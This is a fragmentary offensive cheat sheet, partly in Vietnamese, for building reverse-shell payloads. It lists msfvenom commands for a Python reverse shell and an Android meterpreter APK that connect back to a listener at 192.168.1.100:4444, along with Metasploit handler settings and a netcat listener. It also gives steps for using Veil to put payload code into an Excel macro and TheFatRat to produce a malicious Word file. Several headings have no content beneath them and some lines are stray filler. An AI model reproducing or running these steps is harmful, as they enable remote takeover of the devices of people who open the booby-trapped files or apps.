Reverse Shell
Reverse Shell
msfvenom -l
Binaries
Linux
Windows
Mac
Web Payloads
PHP
ASP
JSP
WAR
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port
to Connect On> -f raw > shell.py
Bash
Perl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters.
Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Handlers
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
android
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444
R>android.apk
Abc
123
NETCAT
nc -l -p 12345
bên LPI:
Msfmania
Python3 MsfMania
hoặc
Veil
veil
s
Veil>: use 1
list
Chọn
use 22
Tên file bat
Copy đường dẫn file bat
/var/lib/veil/output/source/hung.bat
B2: convert
use 3
Copy ra Desktop
cp /var/lib/veil/output/source/hung1.txt /root/Desktop/
Copy toàn bộ code vào macro của excell
Sau đó save lại
TheFATRat
https://github.com/Screetsec/TheFatRat.git
chạy ./setup.sh
chạy lệnh
fatrat
Chọn 7
Chọn 2
Chọn 3
Tạo ra file word trong : /root/Fatrat_Generated/
Tấn công
Mở Metasploit
Msfconsole